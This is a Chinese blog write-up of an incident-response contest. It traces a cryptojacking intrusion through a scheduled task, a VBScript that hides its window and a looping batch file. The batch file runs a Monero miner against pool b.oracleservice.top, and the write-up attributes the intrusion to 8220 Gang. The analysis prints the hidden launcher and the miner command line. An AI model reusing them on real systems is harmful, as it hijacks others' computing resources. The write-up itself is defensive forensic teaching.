
  <!DOCTYPE html>
  <html lang="en"  
    
      data-theme-mode="auto"
    
  >
  <head>
  
  <meta charset="utf-8">
  

  

  

  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_0khxww3tj3q9';window.REIMU_CONFIG.clipboard_tips = {"success":{"en":"Copy successfully (*^▽^*)","zh-CN":"复制成功 (*^▽^*)","zh-TW":"複製成功 (*^▽^*)","ja":"コピー成功 (*^▽^*)","pt-BR":"Copiado com sucesso (*^▽^*)"},"fail":{"en":"Copy failed (ﾟ⊿ﾟ)ﾂ","zh-CN":"复制失败 (ﾟ⊿ﾟ)ﾂ","zh-TW":"複製失敗 (ﾟ⊿ﾟ)ﾂ","ja":"コピー失敗 (ﾟ⊿ﾟ)ﾂ","pt-BR":"Falha ao copiar (ﾟ⊿ﾟ)ﾂ"},"copyright":{"enable":false,"count":50,"license_type":"by-nc-sa"}};window.REIMU_CONFIG.clipboard_tips.copyright.content = 'All articles on this blog are licensed under the BY-NC-SA license agreement unless otherwise stated. Please indicate the source when reprinting!';window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'http://example.com';window.REIMU_CONFIG.i18n_languages = ["en"];</script>
  
  <title>
    solar应急响应月赛（5月） |
    
    mX1@0_blog
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  
  
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_0khxww3tj3q9.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="solar应急响应月赛（5月）1 攻击者使用什么漏洞获取了服务器的配置文件？ 题目描述：某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器，flag格式为：flag{CVE-2020-12345}  查看Administrator的桌面，存在CrushFTP  搜CrushFTP近期CVE漏洞  2 系统每天晚上系统都会卡卡的帮小明找到问题出在了那？ 题目">
<meta property="og:type" content="article">
<meta property="og:title" content="solar应急响应月赛（5月）">
<meta property="og:url" content="http://example.com/2025/06/01/solar-ying-ji-xiang-ying-yue-sai-5-yue/index.html">
<meta property="og:site_name" content="mX1@0_blog">
<meta property="og:description" content="solar应急响应月赛（5月）1 攻击者使用什么漏洞获取了服务器的配置文件？ 题目描述：某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器，flag格式为：flag{CVE-2020-12345}  查看Administrator的桌面，存在CrushFTP  搜CrushFTP近期CVE漏洞  2 系统每天晚上系统都会卡卡的帮小明找到问题出在了那？ 题目">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://pic1.imgdb.cn/item/683c79c258cb8da5c8218d99.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/683c7b8158cb8da5c8218ed0.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/683c6dcc58cb8da5c82188bd.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/683c679a58cb8da5c8218494.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/683c685258cb8da5c82184e2.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/683c69d158cb8da5c82185d7.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/683c6c6358cb8da5c82187f2.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/683c6cbd58cb8da5c821881f.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/683c76bc58cb8da5c8218bc0.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/683c718a58cb8da5c8218a94.png">
<meta property="article:published_time" content="2025-06-01T14:37:43.740Z">
<meta property="article:modified_time" content="2025-06-01T16:11:10.069Z">
<meta property="article:author" content="mX1@0">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pic1.imgdb.cn/item/683c79c258cb8da5c8218d99.png">
  
  
  
    <link rel="shortcut icon" href="/images/%E5%9B%BE1.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" as="style" onload="this.onload&#x3D;null;this.rel&#x3D;&#39;stylesheet&#39;" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" integrity="sha384-IfxC36XL&#x2F;toUyJ939C73PcgMuRzAZuIzZxE38drsmO5p6jD7ei+Zx&#x2F;1oA&#x2F;0l8ysE" crossorigin="anonymous">
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.2/dist/aos.css" integrity="sha384-GMRP93c6Hkz9JVKGAuRR3nTS7M07RwPgTFenXiosjq2VbVgvdDNcz1g6Mkj8AONa" crossorigin="anonymous">

  
  
  
<meta name="generator" content="Hexo 7.2.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

  <body>
    
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
        
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
        
      </div>
      
      
        
      
      <div class="loading-word">Loading...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>
<div id="heatmap-tooltip"></div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <a class="main-nav-link" href="/en/">首页</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <a class="main-nav-link" href="/en/archives">归类</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <a class="main-nav-link" href="/en/about">关于</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <a class="main-nav-link" href="/en/friend">右链</a>
        </span>
      
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
    
    
  </nav>
  
    
    <nav id="i18n-nav">
      <div class="custom-dropdown">
        <div class="select-selected" id="select-selected">
          <span id="nav-language-btn" class="nav-icon" style="padding: 0 20px 0 0"></span>
          <span id="selected-lang">English</span>
        </div>
        <ul class="select-items" id="select-items">
          
            <li data-value="zh-CN" >简体中文</li>
          
            <li data-value="en" class="selected">English</li>
          
        </ul>
      </div>
      <script>
        var selectSelected = document.getElementById("select-selected");
        var selectedLang = document.getElementById("selected-lang");
        var selectItems = document.getElementById("select-items");
        var selectOptions = selectItems.querySelectorAll("li");

        selectSelected.addEventListener("click", () => {
          selectItems.classList.toggle("show");
        });

        selectOptions.forEach((item) => {
          item.addEventListener("click", () => {
            const langMap = {};
            
              langMap['zh-CN'] = '/2025/06/01/solar-ying-ji-xiang-ying-yue-sai-5-yue/';
            
              langMap['en'] = '/en/2025/06/01/solar-ying-ji-xiang-ying-yue-sai-5-yue/';
            
            selectedLang.textContent = item.textContent;
            selectItems.classList.remove("show");
            selectOptions.forEach((option) => {
              option.classList.remove("selected");
            });
            item.classList.add("selected");
            window.location = langMap[item.dataset.value];
          });
        });

        document.addEventListener("click", (event) => {
          if (!event.target.closest(".custom-dropdown")) {
            selectItems.classList.remove("show");
          }
        });
      </script>
    </nav>
  
</div>
<header id="header">
  
    
      
        <picture>
          
        </picture>
        
          <img  fetchpriority="high" src="/images/%E7%8E%9B%E8%8E%8E%E6%8B%89%E8%92%82.jpg" alt="solar应急响应月赛（5月）">
        
      
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">solar应急响应月赛（5月）</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content"  class="sidebar-right" >
          <aside id="sidebar">
  
  
  
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        
          <div class="sidebar-author">
  <img data-src="/avatar/source/_data/avatar/avatar.webp" data-sizes="auto" alt="mX1@0" class="lazyload">
  <div class="sidebar-author-name">mX1@0</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Post</div>
    <div class="sidebar-state-number">63</div>
  </div>
  <div class="sidebar-state-category">
    <div>Category</div>
    <div class="sidebar-state-number">18</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tag</div>
    <div class="sidebar-state-number">24</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/en/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/en/archives" aria-label="归类"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">归类</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/en/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/en/friend" aria-label="右链"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">右链</div>
      </div>
    
  
</div>

        
      
      
        
        
      
    </div>
  </div>

  <div class="sidebar-widget">
  
  </div>
  
</aside>

          <section id="main"><article id="post-solar应急响应月赛（5月）" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link" data-aos="zoom-in">
    <time datetime="2025-06-01T14:37:43.740Z" itemprop="datePublished">2025-06-01</time>
    <time style="display: none;" id="post-update-time">2025-06-02</time>
  </span>
</div>

      

    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <h1 id="solar应急响应月赛（5月）"><a href="#solar应急响应月赛（5月）" class="headerlink" title="solar应急响应月赛（5月）"></a>solar应急响应月赛（5月）</h1><h2 id="1-攻击者使用什么漏洞获取了服务器的配置文件？"><a href="#1-攻击者使用什么漏洞获取了服务器的配置文件？" class="headerlink" title="1 攻击者使用什么漏洞获取了服务器的配置文件？"></a>1 攻击者使用什么漏洞获取了服务器的配置文件？</h2><blockquote>
<p>题目描述：某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器，flag格式为：flag{CVE-2020-12345}</p>
</blockquote>
<p>查看Administrator的桌面，存在CrushFTP</p>
<p><img src="https://pic1.imgdb.cn/item/683c79c258cb8da5c8218d99.png"></p>
<p>搜CrushFTP近期CVE漏洞</p>
<p><img src="https://pic1.imgdb.cn/item/683c7b8158cb8da5c8218ed0.png"></p>
<h2 id="2-系统每天晚上系统都会卡卡的帮小明找到问题出在了那？"><a href="#2-系统每天晚上系统都会卡卡的帮小明找到问题出在了那？" class="headerlink" title="2 系统每天晚上系统都会卡卡的帮小明找到问题出在了那？"></a>2 系统每天晚上系统都会卡卡的帮小明找到问题出在了那？</h2><blockquote>
<p>题目描述：flag为配置名称（无空格）</p>
</blockquote>
<p> <strong>可能的原因分析</strong></p>
<ol>
<li><strong>计划任务（Task Scheduler）</strong><ul>
<li>Windows 默认有一些维护任务（如 <code>Defrag</code> 碎片整理、<code>WindowsUpdate</code> 自动更新）可能在夜间运行。</li>
<li>检查 <code>taskschd.msc</code>（任务计划程序）中的任务。</li>
</ul>
</li>
<li><strong>Windows Update 自动更新</strong><ul>
<li><code>WindowsUpdate</code> 可能配置为夜间自动更新，占用大量资源。</li>
</ul>
</li>
<li><strong>磁盘碎片整理（Defrag）</strong><ul>
<li>默认情况下，Windows 会定期进行磁盘优化（<code>ScheduledDefrag</code>）。</li>
</ul>
</li>
<li><strong>防病毒扫描（Windows Defender 或第三方杀毒软件）</strong><ul>
<li>可能设置了夜间全盘扫描。</li>
</ul>
</li>
<li><strong>资源占用高的服务</strong><ul>
<li>如 <code>Superfetch</code>（SysMain）、<code>Windows Search</code> 索引服务可能导致卡顿。</li>
</ul>
</li>
<li><strong>虚拟内存（Pagefile）配置问题</strong><ul>
<li>如果虚拟内存设置不合理，可能导致系统变卡。</li>
</ul>
</li>
</ol>
<p>根据以上思路，找到了恶意的计划任务，如下图</p>
<p><img src="https://pic1.imgdb.cn/item/683c6dcc58cb8da5c82188bd.png"></p>
<p><strong>sql backing up就是导致每晚卡顿的原因</strong></p>
<ul>
<li>知识：</li>
</ul>
<p><code>C:\Windows\System32\Tasks</code> 是 <strong>Windows 操作系统存储计划任务（Scheduled Tasks）的默认路径</strong>。</p>
<p>也可以通过 <strong>任务计划程序（taskschd.msc）</strong> 管理所有任务</p>
<h2 id="3-恶意域名是什么？"><a href="#3-恶意域名是什么？" class="headerlink" title="3 恶意域名是什么？"></a>3 恶意域名是什么？</h2><blockquote>
<p>题目描述：flag格式为：flag{xxx.xxxxxxxx.xxx}</p>
</blockquote>
<p>查看计划任务调用的内容</p>
<p><img src="https://pic1.imgdb.cn/item/683c679a58cb8da5c8218494.png"></p>
<p>这段代码是一个 XML 格式的操作指令，通常用于自动化任务或系统配置中。具体解释如下：</p>
<ol>
<li><strong><code>&lt;Actions Context="Author"&gt;</code></strong><br> 表示这是一个”作者上下文”的操作（可能是创建或设计阶段使用的操作）</li>
<li><strong><code>&lt;Exec&gt;</code></strong><br> 执行命令的指令</li>
<li><strong><code>&lt;Command&gt;"C:\Program Files\Microsoft SQL Server\90\Shared\sqlwsmprovhost.vbs"&lt;/Command&gt;</code></strong><br> 指定要执行的命令是运行位于 SQL Server 2005(版本90)共享目录下的一个 VBScript 文件</li>
</ol>
<p>找到该路径下的sqlwsmprovhost.vbs文件，并查看，如下图</p>
<p><img src="https://pic1.imgdb.cn/item/683c685258cb8da5c82184e2.png"></p>
<p>这段 VBScript 代码的功能是创建一个 <strong>WScript.Shell</strong> 对象，并运行一个名为 <strong><code>sqlwscript.cmd</code></strong> 的批处理文件（隐藏窗口运行）。具体解释如下：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//创建一个 WScript.Shell 对象，用于执行系统命令或运行程序</span><br><span class="line">set ws = createobject("wscript.shell")  </span><br></pre></td></tr></tbody></table></figure>

<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//运行 "sqlwscript.cmd" 这个批处理文件，参数 `0` 表示隐藏窗口运行</span><br><span class="line">ws.Run """sqlwscript.cmd""", 0  </span><br></pre></td></tr></tbody></table></figure>

<ol>
<li><strong><code>WScript.Shell</code></strong><ul>
<li>是 Windows 脚本宿主（WSH）提供的对象，用于执行系统命令、操作注册表、运行程序等。</li>
<li>这里主要用于运行外部程序（<code>.cmd</code> 文件）。</li>
</ul>
</li>
<li><strong><code>ws.Run """sqlwscript.cmd""", 0</code></strong><ul>
<li><code>Run</code> 方法用于执行指定的程序或命令。</li>
<li><code>"""sqlwscript.cmd"""</code> 的写法是因为 VBScript 需要用双引号包裹路径，而路径本身可能包含空格，所以用 <code>""</code> 进行转义（相当于 <code>"sqlwscript.cmd"</code>）。</li>
<li><code>0</code> 表示运行时不显示窗口（隐藏运行）。</li>
</ul>
</li>
</ol>
<p>然后，打开sqlwscript.cmd查看如下：</p>
<p><img src="https://pic1.imgdb.cn/item/683c69d158cb8da5c82185d7.png"></p>
<p>这段批处理脚本 (<code>sqlwscript.cmd</code>) 是一个 <strong>无限循环执行的挖矿脚本</strong>，通常用于 <strong>加密货币挖矿（可能是恶意挖矿程序）</strong>。以下是详细分析：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br></pre></td></tr></tbody></table></figure>

<ul>
<li>关闭命令回显，使脚本运行时不会显示执行的命令（隐蔽执行）。</li>
</ul>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cd /d "%~dp0"</span><br></pre></td></tr></tbody></table></figure>

<ul>
<li>切换到脚本所在的目录（<code>%~dp0</code> 表示当前批处理文件的完整路径）。</li>
<li>确保脚本能正确访问同目录下的文件（如 <code>sqlwpr.exe</code>）。</li>
</ul>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">:start</span><br></pre></td></tr></tbody></table></figure>

<ul>
<li>定义一个标签 <code>:start</code>，用于循环跳转。</li>
</ul>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlwpr.exe -a rx/0 --url b.oracleservice.top --user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -t 0</span><br></pre></td></tr></tbody></table></figure>

<ul>
<li><strong><code>sqlwpr.exe</code></strong> 是一个 <strong>加密货币挖矿程序</strong>（可能是恶意软件）。</li>
<li><strong>参数解析</strong>：<ul>
<li><code>-a rx/0</code>：指定挖矿算法（<code>RandomX</code>，常用于门罗币 Monero/XMR 挖矿）。</li>
<li><code>--url b.oracleservice.top</code>：连接到的<u>矿池服务器地址</u>（矿工提交算力并获取奖励）。</li>
<li><code>--user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ</code>：挖矿钱包地址（收益归攻击者所有）。</li>
<li><code>-t 0</code>：使用所有可用的 CPU 线程挖矿（最大化资源占用）。</li>
</ul>
</li>
</ul>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">goto start</span><br></pre></td></tr></tbody></table></figure>

<ul>
<li>跳回 <code>:start</code> 标签，形成无限循环，确保挖矿程序持续运行（即使崩溃也会重启）。</li>
</ul>
<p><strong>所以 恶意域名是矿池服务器地址</strong></p>
<h3 id="行为分析"><a href="#行为分析" class="headerlink" title="行为分析"></a>行为分析</h3><ol>
<li><strong>这是一个隐蔽的恶意挖矿脚本</strong>：<ul>
<li>通过 <code>@echo off</code> 和隐藏窗口运行（结合之前的 VBScript）来避免被发现。</li>
<li>无限循环确保挖矿程序长期驻留。</li>
</ul>
</li>
<li><strong>使用的技术</strong>：<ul>
<li><strong><code>RandomX</code> 算法</strong>（<code>rx/0</code>）通常用于 <strong>门罗币（XMR）</strong> 挖矿。</li>
<li>矿池地址 <code>b.oracleservice.top</code> 可能是攻击者控制的服务器。</li>
<li>钱包地址 <code>46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ</code> 用于接收挖矿收益。</li>
</ul>
</li>
<li><strong>影响</strong>：<ul>
<li><strong>CPU 资源占用极高</strong>，导致系统变卡、发热增加。</li>
<li>长期运行会增加电费消耗，并可能缩短硬件寿命。</li>
<li>可能是通过木马或漏洞植入的（如恶意软件、钓鱼攻击等）。</li>
</ul>
</li>
</ol>
<h3 id="应对措施"><a href="#应对措施" class="headerlink" title="应对措施"></a><strong>应对措施</strong></h3><ol>
<li><strong>立即终止恶意进程</strong>：<ul>
<li>打开任务管理器（Ctrl+Shift+Esc），结束 <code>sqlwpr.exe</code> 和 <code>wscript.exe</code> 进程。</li>
<li>检查后台程序，关闭可疑项目。</li>
</ul>
</li>
<li><strong>删除相关文件</strong>：<ul>
<li>找到脚本所在目录（<code>%~dp0</code>），删除 <code>sqlwscript.cmd</code> 和 <code>sqlwpr.exe</code>。</li>
<li>检查启动项（<code>msconfig</code> 或 <code>任务管理器 &gt; 启动</code>），移除恶意条目。</li>
</ul>
</li>
<li><strong>安全防护</strong>：<ul>
<li>使用杀毒软件（如 Windows Defender、Malwarebytes）全盘扫描。</li>
<li>检查系统是否被植入其他后门（如远控木马）。</li>
</ul>
</li>
<li><strong>防止再次感染</strong>：<ul>
<li>不要随意运行来历不明的脚本或程序。</li>
<li>保持系统和软件更新，修补安全漏洞。</li>
</ul>
</li>
</ol>
<h2 id="4-疑似是什么组织发动的攻击？"><a href="#4-疑似是什么组织发动的攻击？" class="headerlink" title="4 疑似是什么组织发动的攻击？"></a>4 疑似是什么组织发动的攻击？</h2><blockquote>
<p>题目描述：flag格式为：flag{123XXX}（无空格注意大小写）</p>
</blockquote>
<p>搜索恶意域名，发现是8220挖矿组织</p>
<img src="https://pic1.imgdb.cn/item/683c6c6358cb8da5c82187f2.png" style="zoom:50%;">

<p>继续搜索8220挖矿组织，搜到其全名</p>
<img src="https://pic1.imgdb.cn/item/683c6cbd58cb8da5c821881f.png" style="zoom:50%;">

<p><strong>最终 该组织为8220 Gang</strong></p>
<h2 id="5-攻击者C2服务器IP是什么？"><a href="#5-攻击者C2服务器IP是什么？" class="headerlink" title="5 攻击者C2服务器IP是什么？"></a>5 攻击者C2服务器IP是什么？</h2><blockquote>
<p>题目描述：flag格式为：flag{123.123.123.123}</p>
</blockquote>
<p>查看挖矿程序的上传时间，确定时间大概在2025.5.27 23:20:00左右</p>
<p><img src="https://pic1.imgdb.cn/item/683c76bc58cb8da5c8218bc0.png"></p>
<p>查询windows的安全日志，筛选 <code>5156</code> 事件（Windows 过滤平台放行连接），逐一查询这段时间之后powershell的出战痕迹</p>
<p>当然，也可以直接导出筛选日志进行关键词搜索</p>
<p>将已筛选的日志导出为txt文件，然后直接搜索powershell.exe关键词，找出可疑的出站目的IP地址，即为C2服务器IP</p>
<p><img src="https://pic1.imgdb.cn/item/683c718a58cb8da5c8218a94.png"></p>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      
      

    </footer>
  </div>
  
  <nav id="article-nav" data-aos="fade-up">
    
      
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/images/%E7%8E%9B%E8%8E%8E%E6%8B%89%E8%92%82.jpg" data-sizes="auto" alt="第二届Parloo杯应急响应" class="lazyload">
          
        
        <a href="/en/2025/06/03/di-er-jie-parloo-bei-ying-ji-xiang-ying/"></a>
        <div class="article-nav-caption">Prev</div>
        <h3 class="article-nav-title">
          
            第二届Parloo杯应急响应
          
        </h3>
      </div>
    
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="/images/%E7%8E%9B%E8%8E%8E%E6%8B%89%E8%92%82.jpg" data-sizes="auto" alt="RCE-labs" class="lazyload">
        
      
      <a href="/en/2025/05/26/rce-labs/"></a>
      <div class="article-nav-caption">Next</div>
      <h3 class="article-nav-title">
        
          RCE-labs
        
      </h3>
    </div>
    
  </nav>


</article>










</section>
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      
      
      
        2024-2025
      
      <span class="footer-info-sep "></span>
      mX1@0
    </div>
    
      <div>
        Powered by&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        202.4k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        12:25
      </div>
    
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">Number of visits&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">Number of visitors&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        
          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      
        <div class="sidebar-author">
  <img data-src="/avatar/source/_data/avatar/avatar.webp" data-sizes="auto" alt="mX1@0" class="lazyload">
  <div class="sidebar-author-name">mX1@0</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Post</div>
    <div class="sidebar-state-number">63</div>
  </div>
  <div class="sidebar-state-category">
    <div>Category</div>
    <div class="sidebar-state-number">18</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tag</div>
    <div class="sidebar-state-number">24</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/en/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/en/archives" aria-label="归类"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">归类</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/en/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/en/friend" aria-label="右链"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">右链</div>
      </div>
    
  
</div>

      
    
  </div>
  
    
    
  
</nav>

    </div>
    
    
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>





<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
